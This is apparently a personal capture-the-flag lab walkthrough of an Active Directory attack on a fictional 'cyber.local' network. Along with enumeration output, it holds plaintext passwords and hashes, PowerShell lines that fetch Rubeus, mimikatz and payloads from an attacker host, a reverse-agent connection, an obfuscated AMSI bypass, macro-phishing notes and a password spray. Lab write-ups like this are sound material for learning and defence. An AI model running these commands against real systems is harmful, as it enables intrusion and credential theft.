DC is time server: yes
DC has writeable DS: yes
DC is Global Catalog: yes
DC is running KDC: yes
[Global Catalog (GC) Information]
GC Name: coredc.core.cyber.local
GC Address: 10.9.15.10
GC Site: core
GC Flags: [0x0003f3fd]
GC Is PDC: yes
GC is time server: yes
GC has writeable DS: yes
GC is running KDC: yes
[Domain: D3V]
DNS Domain: d3v.local
Netbios name: D3V
Forest name: d3v.local
Trustee DNS name: cyber.local
Client site name: Default-First-Site-Name
Domain SID: S-1-5-21-1741135793-2392241712-4132009386
Domain GUID: 00000000-0000-0000-0000-000000000000
Trust Flags: [0x0022]
[0x0002 - Outbound]
[0x0020 - Inbound]
Trust type: Up Level
Trust Attributes: [0x0008]
[0x0008 - Forest transitive]
Trust Direction: Twoway Trust
Trust Mode: In other forest Trust (OFT)
Domain flags: [0x0000]
[Domain Controller (DC) Information]
DC Name: d3dc.d3v.local
DC Address: 10.9.30.10
DC Site: Default-First-Site-Name
DC Flags: [0x0003f3fd]
DC Is PDC: yes
DC is time server: yes
DC has writeable DS: yes
DC is Global Catalog: yes
DC is running KDC: yes
[Domain: M3C]
DNS Domain: m3c.local
Netbios name: M3C
Forest name: m3c.local
Trustee DNS name: cyber.local
Client site name: Default-First-Site-Name
Domain SID: S-1-5-21-340507432-2615605230-720798708
Domain GUID: 00000000-0000-0000-0000-000000000000
Trust Flags: [0x0020]
[0x0020 - Inbound]
Trust type: Up Level
Trust Attributes: [0x0008]
[0x0008 - Forest transitive]
Trust Direction: Zeroway Trust
Trust Mode: In other forest Trust (OFT)
Domain flags: [0x0000]
[Domain Controller (DC) Information]
DC Name: m3dc.m3c.local
DC Address: 10.9.20.10
DC Site: Default-First-Site-Name
DC Flags: [0x0001f3fd]
DC Is PDC: yes
DC is time server: yes
DC has writeable DS: yes
DC is Global Catalog: yes
DC is running KDC: yes
[Domain: inception]
DNS Domain: inception.local
Netbios name: inception
Forest name: inception.local
Trustee DNS name: cyber.local
Client site name: Default-First-Site-Name
Domain SID: S-1-5-21-3923830851-530095044-3265323199
Domain GUID: 00000000-0000-0000-0000-000000000000
Trust Flags: [0x0022]
[0x0002 - Outbound]
[0x0020 - Inbound]
Trust type: Up Level
Trust Attributes: [0x0008]
[0x0008 - Forest transitive]
Trust Direction: Twoway Trust
Trust Mode: In other forest Trust (OFT)
Domain flags: [0x0000]
[Domain Controller (DC) Information]
DC Name: indc.inception.local
DC Address: 10.9.40.5
DC Site: Default-First-Site-Name
DC Flags: [0x0003f3fd]
DC Is PDC: yes
DC is time server: yes
DC has writeable DS: yes
DC is Global Catalog: yes
DC is running KDC: yes
Summary of Forests and Domains:
- CORE.CYBER.LOCAL (Primary Domain and Forest)
  - Forest Name: cyber.local
  - DC Name: coredc.core.cyber.local
  - DC Address: 10.9.15.10
  - Trustee DNS name: None (Primary Domain)
- CYBER (Domain within the CORE Forest)
  - Forest Name: cyber.local
  - DC Name: cydc.cyber.local
  - DC Address: 10.9.10.10
  - Trustee DNS name: CORE.CYBER.LOCAL
  - Trust Direction: Twoway Trust with CORE
- D3V (Separate Forest with Trust Relationship)
  - Forest Name: d3v.local
  - DC Name: d3dc.d3v.local
  - DC Address: 10.9.30.10
  - Trustee DNS name: cyber.local
  - Trust Direction: Twoway Trust with CYBER
- M3C (Separate Forest with Trust Relationship)
  - Forest Name: m3c.local
  - DC Name: m3dc.m3c.local
  - DC Address: 10.9.20.10
  - Trustee DNS name: cyber.local
  - Trust Direction: Zeroway Trust with CYBER
- Inception (Separate Forest with Trust Relationship)
  - Forest Name: inception.local
  - DC Name: indc.inception.local
  - DC Address: 10.9.40.5
  - Trustee DNS name: cyber.local
  - Trust Direction: Twoway Trust with CYBER
./adtool --keytab=/etc/krb5.keytab --logon-as=COREWEBDL$ -a search-ou --name="core.cyber.local" -t | ./adtool --keytab=/etc/krb5.keytab --logon-as=COREWEBDL$ -a lookup-object --dn=- --attr=description

└─/ NTLM HASH : 4182816cd42bdb6d20f7fb89703f5c48 AES-256 HASH : e55623691c0e6b9aa833de108c382262f6af90cd77ecee5ff7f863d5e6405078 AES-128 HASH : 520f11715eeb76fd9cbc8b0e08e387e1
/opt/pbis/bin/adtool --keytab=/etc/krb5.keytab --logon-as=COREWEBDL$ -a lookup-object --attr=description --dn 'OU=Users,OU=core,DC=core,DC=cyber,DC=local'
/opt/pbis/bin/adtool --keytab=/etc/krb5.keytab --logon-as=COREWEBDL$ -a search-object --filter '(&(objectClass=user)(objectCategory=person))' -t | ./adtool --keytab=/etc/krb5.keytab --logon-as=COREWEBDL$ -a lookup-object --dn=- --attr=description
adtool -a lookup-object --dn=- --attr=description
kinit 'COREWEBDL$@CORE.CYBER.LOCAL' -k -t /etc/krb5.keytab
https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap
./adtool -a search-user --name CN="*" --keytab=/etc/krb5.keytab -n "COREWEBDL$" | grep "CN" | while read line; do echo "$line" && ./adtool --keytab=/etc/krb5.keytab -n 'COREWEBDL$@CORE.CYBER.LOCAL' -a lookup-object --dn="$line" --attr "description" && echo "======================"; done

CN=Timothy Jorgenson,OU=Accounting,OU=Users,OU=core,DC=core,DC=cyber,DC=local
======================
CN=George Wirth,OU=Interns,OU=Users,OU=core,DC=core,DC=cyber,DC=local
v765#QLm^8 #Cyb3rN3t1C5{Cr3d$_!n_De$cr!pti0ns}
./agent_linux -connect 10.10.15.207:9001 --ignore-cert
Certenroll prep and Phishing for 10.9.15.200
Followed the steps to add the certificate using the root CA obtained like this:
smbclient.py 'core.cyber.local/george.wirth:v765#QLm^8@10.9.10.10'
/usr/local/bin/smbclient.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.12.0.dev1+20230921.20754.9c8f344b', 'smbclient.py')
Impacket v0.12.0.dev1+20230921.20754.9c8f344b - Copyright 2023 Fortra
Type help for list of commands
# use SYSVOL
# ls
drw-rw-rw- 0 Tue Dec 31 07:17:36 2019 .
drw-rw-rw- 0 Tue Dec 31 07:17:36 2019 ..
drw-rw-rw- 0 Tue Dec 31 07:17:36 2019 cyber.local
# cd cyber.local
# ls
drw-rw-rw- 0 Tue Dec 31 07:23:38 2019 .
drw-rw-rw- 0 Tue Dec 31 07:23:38 2019 ..
drw-rw-rw- 0 Thu Dec 14 04:16:17 2023 DfsrPrivate
drw-rw-rw- 0 Wed Jun 17 22:34:20 2020 Policies
drw-rw-rw- 0 Sun Jan 12 15:26:20 2020 scripts
# cd scripts
# ls
drw-rw-rw- 0 Sun Jan 12 15:26:20 2020 .
drw-rw-rw- 0 Sun Jan 12 15:26:20 2020 ..
-rw-rw-rw- 1472 Fri Jan 15 17:10:22 2021 ADFS-Token.cer
-rw-rw-rw- 468 Fri Jan 10 01:58:27 2020 cydc.cyber.local_Cyber-CA.crt
-rw-rw-rw- 200 Fri Jan 10 02:19:51 2020 Disable-NetBIOS.ps1
-rw-rw-rw- 1019904 Fri Jan 10 13:07:53 2020 LAPSx64.msi
-rw-rw-rw- 3723 Fri Jan 10 01:58:27 2020 WildCard.pfx
# mget *
[*] Downloading ADFS-Token.cer
[*] Downloading cydc.cyber.local_Cyber-CA.crt
[*] Downloading Disable-NetBIOS.ps1
[*] Downloading LAPSx64.msi
[*] Downloading WildCard.pfx
# exit
- Log on as a local computer administrator account.
- You can add the Root CA certificate to the computer's Trusted Root Certification Authorities store via the MMC:
- Open the Run command and type MMC.
- Select File then Add/Remove Snap-in…
- Select Certificates, and click the Add > button.
- Select Computer Account, and click the Next button.
- Click the Finish button.
- Click OK.
- Expand Certificates (Local Computer).
- Expand Trusted Root Certification Authorities.
- Right click on Certificates, and select All Tasks, and then select Import…
- Certificate Import Wizard comes up.
- Click the Next button.
- Click the Browse… button and navigate to the CER file.
- Click the Next button.
- Leave the defaults, and click the Next button.
- Click the Finish button.

Office macro Microsoft Word mail phishing
https://github.com/christophetd/spoofing-office-macro





Baby-Try2.docm
IT should be in the projects

10.9.15.200 COREWKT001


$Reply.Body = "Cyb3rN3t1C5{Y0u_C@nt_Ph!`$h_M3}"
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://10.10.15.57:8080/HANDICAPPED_LEADERSHIP.exe', 'C:\Users\Ilene.Rasch\Desktop\HANDICAPPED_LEADERSHIP.exe')"
Didn't work because of the group policy.
The next try was to check what rights the user ilene.rasch has in BloodHound.
The following results were found.

powershell -Command "(New-Object Net.WebClient).DownloadFile('http://10.10.15.57:8080/powerview.ps1', 'C:\Users\Ilene.Rasch\Desktop\powerview.ps1')"
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://10.10.15.57:8080/powermad.ps1', 'C:\Users\Ilene.Rasch\Desktop\powermad.ps1')"
bloodhound-python -u 'george.wirth' -p 'v765#QLm^8' -d 'core.cyber.local' -c all -ns 10.9.10.10
bloodhound-python -u 'george.wirth' -p 'v765#QLm^8' -d 'core.cyber.local' -c all -ns 10.9.20.10
I know that I need to get the DevOps user, so I am also trying the other domain to see what george.wirth can access.
cme smb 10.9.10.10-20 -u 'george.wirth' -p 'v765#QLm^8' -d core.cyber.local --shares
SMB 10.9.10.10 445 CYDC [+] core.cyber.local\george.wirth:v765#QLm^8
SMB 10.9.10.18 445 CYAPP [+] core.cyber.local\george.wirth:v765#QLm^8
SMB 10.9.10.13 445 CYMX [+] core.cyber.local\george.wirth:v765#QLm^8
SMB 10.9.10.18 445 CYAPP [*] Enumerated shares
SMB 10.9.10.18 445 CYAPP Share Permissions Remark
SMB 10.9.10.18 445 CYAPP ----- ----------- ------
SMB 10.9.10.18 445 CYAPP ADMIN$ Remote Admin
SMB 10.9.10.18 445 CYAPP C$ Default share
SMB 10.9.10.18 445 CYAPP IPC$ READ Remote IPC
SMB 10.9.10.10 445 CYDC [*] Enumerated shares
SMB 10.9.10.10 445 CYDC Share Permissions Remark
SMB 10.9.10.10 445 CYDC ----- ----------- ------
SMB 10.9.10.10 445 CYDC ADMIN$ Remote Admin
SMB 10.9.10.10 445 CYDC C$ Default share
SMB 10.9.10.10 445 CYDC IPC$ READ Remote IPC
SMB 10.9.10.10 445 CYDC NETLOGON READ Logon server share
SMB 10.9.10.10 445 CYDC SYSVOL READ Logon server share
SMB 10.9.10.12 445 CYWAP [+] core.cyber.local\george.wirth:v765#QLm^8
SMB 10.9.10.13 445 CYMX [*] Enumerated shares
SMB 10.9.10.13 445 CYMX Share Permissions Remark
SMB 10.9.10.13 445 CYMX ----- ----------- ------
SMB 10.9.10.13 445 CYMX address READ
SMB 10.9.10.13 445 CYMX ADMIN$ Remote Admin
SMB 10.9.10.13 445 CYMX C$ Default share
SMB 10.9.10.13 445 CYMX IPC$ READ Remote IPC
SMB 10.9.10.11 445 CYADFS [+] core.cyber.local\george.wirth:v765#QLm^8
SMB 10.9.10.12 445 CYWAP [*] Enumerated shares
SMB 10.9.10.12 445 CYWAP Share Permissions Remark
SMB 10.9.10.12 445 CYWAP ----- ----------- ------
SMB 10.9.10.12 445 CYWAP ADMIN$ Remote Admin
SMB 10.9.10.12 445 CYWAP C$ Default share
SMB 10.9.10.12 445 CYWAP IPC$ READ Remote IPC
SMB 10.9.10.14 445 CYFS [+] core.cyber.local\george.wirth:v765#QLm^8
SMB 10.9.10.11 445 CYADFS [*] Enumerated shares
SMB 10.9.10.11 445 CYADFS Share Permissions Remark
SMB 10.9.10.11 445 CYADFS ----- ----------- ------
SMB 10.9.10.11 445 CYADFS ADMIN$ Remote Admin
SMB 10.9.10.11 445 CYADFS C$ Default share
SMB 10.9.10.11 445 CYADFS IPC$ READ Remote IPC
SMB 10.9.10.11 445 CYADFS print$ READ Printer Drivers
SMB 10.9.10.17 445 CYGW [+] core.cyber.local\george.wirth:v765#QLm^8
SMB 10.9.10.17 445 CYGW [*] Enumerated shares
SMB 10.9.10.17 445 CYGW Share Permissions Remark
SMB 10.9.10.17 445 CYGW ----- ----------- ------
SMB 10.9.10.17 445 CYGW ADMIN$ Remote Admin
SMB 10.9.10.17 445 CYGW C$ Default share
SMB 10.9.10.17 445 CYGW IPC$ READ Remote IPC
SMB 10.9.10.14 445 CYFS [*] Enumerated shares
SMB 10.9.10.14 445 CYFS Share Permissions Remark
SMB 10.9.10.14 445 CYFS ----- ----------- ------
SMB 10.9.10.14 445 CYFS Accounting
SMB 10.9.10.14 445 CYFS ADMIN$ Remote Admin
SMB 10.9.10.14 445 CYFS Audit
SMB 10.9.10.14 445 CYFS Business Development
SMB 10.9.10.14 445 CYFS C$ Default share
SMB 10.9.10.14 445 CYFS Customer Service
SMB 10.9.10.14 445 CYFS DevOps
SMB 10.9.10.14 445 CYFS Directors
SMB 10.9.10.14 445 CYFS Engineering
SMB 10.9.10.14 445 CYFS GroupShare READ,WRITE
SMB 10.9.10.14 445 CYFS Help Desk
SMB 10.9.10.14 445 CYFS Human Resources
SMB 10.9.10.14 445 CYFS Interns
SMB 10.9.10.14 445 CYFS IPC$ READ Remote IPC
SMB 10.9.10.14 445 CYFS IT Admins
SMB 10.9.10.14 445 CYFS Linux Admins
SMB 10.9.10.14 445 CYFS Management
SMB 10.9.10.14 445 CYFS Marketing
SMB 10.9.10.14 445 CYFS Operations
SMB 10.9.10.14 445 CYFS Purchasing
SMB 10.9.10.14 445 CYFS Quality Assurance
SMB 10.9.10.14 445 CYFS RDS-Users READ,WRITE
SMB 10.9.10.14 445 CYFS Sales
SMB 10.9.10.14 445 CYFS Server Admins
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://10.10.15.57:80/Rubeus.exe', 'C:\Users\Ilene.Rasch\Desktop\Rubeus.exe')"
$psh = [PowerShell]::Create().AddCommand("powershell").AddParameter("ExecutionPolicy","Bypass").Invoke()
[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://10.10.15.57:80/PowerUp.ps1', 'C:\Users\Ilene.Rasch\Desktop\PowerUp.ps1')"
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://10.10.15.57:80/mimikatz.exe', 'C:\Users\Ilene.Rasch\Desktop\mimikatz.exe')"
smbclient.py 'core.cyber.local/george.wirth:v765#QLm^8@10.9.20.14'
# use GroupShare
# ls
drw-rw-rw- 0 Sat Dec 16 15:54:39 2023 .
drw-rw-rw- 0 Sat Dec 16 15:54:39 2023 ..
-rw-rw-rw- 298 Sun Jan 12 01:30:42 2020 aes.key
-rw-rw-rw- 278 Sun Jan 12 01:30:42 2020 passwd.txt
-rw-rw-rw- 95 Sun Jan 12 01:30:42 2020 ReadMe.txt
smbclient.py 'core.cyber.local/george.wirth:v765#QLm^8@10.9.10.13'
Nothing on the above machine.
cme smb 10.9.10.10 -u 'george.wirth' -p 'v765#QLm^8' -d core.cyber.local --users
Decrypting Credentials from an SMB Share
While exploring an SMB share, I stumbled upon two intriguing files: aes.key and passwd.txt. Intrigued by their names and potential contents, I decided to investigate further. My first thought was that aes.key could be an encryption key, and passwd.txt likely contained encrypted data, possibly a password. To explore this hypothesis, I used a PowerShell environment on my Commando VM.
I started by loading the content of aes.key into a variable using the command:
$Key = Get-Content -Path C:\Users\jay\Desktop\aes.key
This command read the contents of the aes.key file and stored it in the $Key variable. Next, I needed to load the encrypted message from the passwd.txt file. I achieved this with the following command:
$EncryptedMessage = Get-Content -Path "C:\Users\jay\Desktop\passwd.txt"
With both the key and the encrypted message in hand, I was ready to attempt decryption. PowerShell offers a convenient way to handle encrypted strings through its SecureString object. I used the ConvertTo-SecureString cmdlet, which is designed to convert encrypted data into a SecureString object, using the key I had just loaded. The command was as follows:
$SecureStringPassword = $EncryptedMessage | ConvertTo-SecureString -Key $Key
Upon executing this command, the encrypted message was converted into a SecureString, a special kind of string in PowerShell that is used for handling sensitive information securely.
However, SecureString objects are not immediately readable. To view the decrypted password, I had to convert it back to a plain text string. This is a sensitive operation since it involves handling a password in an unencrypted form. To do this, I used the .NET class System.Runtime.InteropServices.Marshal, which provides methods for dealing with unmanaged code. The commands were:
$Ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($SecureStringPassword)
$PlainTextPassword = [System.Runtime.InteropServices.Marshal]::PtrToStringBSTR($Ptr)
[System.Runtime.InteropServices.Marshal]::ZeroFreeBSTR($Ptr)
These commands converted the SecureString to a plain text string and then freed the allocated memory to maintain security. Finally, I displayed the decrypted password using:
echo $PlainTextPassword
The output revealed the decrypted password: to7oxaith2Vie9. This successful decryption indicated that the files I found were indeed a key and an encrypted password, and I had managed to uncover the latter using PowerShell's capabilities.
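The following is an added example, not part of the original notes: it shows the full round trip behind the aes.key/passwd.txt pair (how ConvertFrom-SecureString -Key produces such files, and a decrypt function that accepts the key-file layouts PowerShell commonly writes), and contrasts it with the DPAPI-bound form that cannot be decrypted off-host. File paths under $env:TEMP and the sample secret are constructed for the demonstration.

```powershell
# Added example (not from the original notes). Demonstrates why a key file
# stored beside its ciphertext on a readable share gives no protection.

# 1. A 256-bit key as PowerShell usually writes it: one byte value per line.
$Key = New-Object byte[] 32
[System.Security.Cryptography.RandomNumberGenerator]::Create().GetBytes($Key)
$Key | Out-File -FilePath "$env:TEMP\aes.key"          # constructed aes.key

# 2. Encrypt a constructed secret with that portable key (this is what a
#    passwd.txt of this kind is: AES ciphertext, base64-ish hex, no DPAPI).
$Secret = ConvertTo-SecureString "S@mpleSecret123" -AsPlainText -Force
$Secret | ConvertFrom-SecureString -Key $Key | Out-File "$env:TEMP\passwd.txt"

function Unprotect-SharedCredential {
    # Hypothetical helper: decrypts a -Key protected SecureString blob.
    param([string]$KeyPath, [string]$CipherPath)

    # Accept both "one byte per line" and "comma-separated" key files.
    $raw = (Get-Content -Path $KeyPath -Raw).Trim()
    [byte[]]$k = if ($raw -match ',') { $raw -split '\s*,\s*' } else { $raw -split '\s+' }
    if ($k.Length -notin 16, 24, 32) {
        throw "AES key must be 16, 24 or 32 bytes; got $($k.Length)"
    }

    $ss = (Get-Content -Path $CipherPath -Raw).Trim() | ConvertTo-SecureString -Key $k
    $ptr = [Runtime.InteropServices.Marshal]::SecureStringToBSTR($ss)
    try     { [Runtime.InteropServices.Marshal]::PtrToStringBSTR($ptr) }
    finally { [Runtime.InteropServices.Marshal]::ZeroFreeBSTR($ptr) }   # scrub plaintext copy
}

# Anyone who can read both files recovers the secret:
Unprotect-SharedCredential -KeyPath "$env:TEMP\aes.key" -CipherPath "$env:TEMP\passwd.txt"

# 3. Contrast: without -Key the blob is wrapped by DPAPI for this user on this
#    host, so the same blob copied off the share is useless to another principal.
$DpapiBlob = $Secret | ConvertFrom-SecureString
try   { $DpapiBlob | ConvertTo-SecureString -Key $Key | Out-Null }
catch { "DPAPI blob cannot be opened with the shared key: $($_.Exception.Message)" }
```

The defensive takeaway is that -Key protection is only as strong as the storage of the key file; a secret that must live on a share belongs in a vault (or at least the key must not sit next to the ciphertext).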
Preparing for password spray
cme ldap 10.9.10.10 -u 'george.wirth' -p 'v765#QLm^8' -d core.cyber.local --users >> users.txt
awk '/LDAP/{print $5}' users.txt > only_users.txt
Password Spray
cme ldap 10.9.10.10 -u only_users.txt -p 'to7oxaith2Vie9'
LDAP 10.9.10.10 389 CYDC [+] cyber.local\Robert.Ortiz:to7oxaith2Vie9
What can user robert.ortiz access?
cme smb 10.9.10.14 -u robert.ortiz -p 'to7oxaith2Vie9' -d cyber.local --shares

smbclient.py 'cyber.local/robert.ortiz:to7oxaith2Vie9@10.9.10.14'
Type help for list of commands
# use devops
# ls
drw-rw-rw- 0 Sat Dec 16 19:24:21 2023 .
drw-rw-rw- 0 Sat Dec 16 19:24:21 2023 ..
-rw-rw-rw- 70 Mon Jun 8 00:51:39 2020 flag.txt
# cat flag.txt
Cyb3rN3t1C5{D3vOP$_S3cure_Cr3d$}

# Get the scheduled task
$task = Get-ScheduledTask -TaskName "OpenEmail"
# Get the action associated with the task
$action = $task.Actions | Select-Object -First 1
# Extract the executable path from the action
$executablePath = $action.Arguments.Split('"')[1]
# Output the executable path
Write-Output "Executable Path: $executablePath"